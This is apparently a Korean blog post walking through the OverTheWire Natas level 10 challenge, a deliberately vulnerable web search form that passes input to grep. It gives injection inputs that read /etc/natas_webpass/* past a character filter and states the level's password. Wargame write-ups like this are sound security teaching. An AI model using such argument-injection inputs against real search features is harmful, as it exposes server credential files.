Natas Level 9 → Level 10
Username: natas10
URL: http://natas10.natas.labs.overthewire.org
For security reasons, we now filter on certain characters<br><br>
<form>
Find words containing: <input name="needle"><input name="submit" type="submit" value="Search"><br><br>
</form>
Output:
<pre></pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
View sourcecode를 클릭하면 소스가 나온다.
아까랑 다르게 입력에 제한을 걸었다.
grep명령을 막기 위해
'' /etc/natas_webpass/* #
를 입력한다.
난 이렇게 안했는데 다음과 같이 해도 된다고 한다. .
* /etc/natas_webpass/* #
비밀번호는 U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK 이다.
'보안 > Natas' 카테고리의 다른 글
| Natas Level 12 - 웹셀 업로드 (0) | 2017.02.08 |
|---|---|
| Natas Level 11 - XOR (0) | 2017.02.08 |
| Natas Level 9 - 커맨드인젝션 (0) | 2017.02.08 |
| Natas Level 8 - php코드가 존재할 때 2 (0) | 2017.02.08 |
| Natas Level 7 - 불필요한 페이지 (0) | 2017.02.08 |
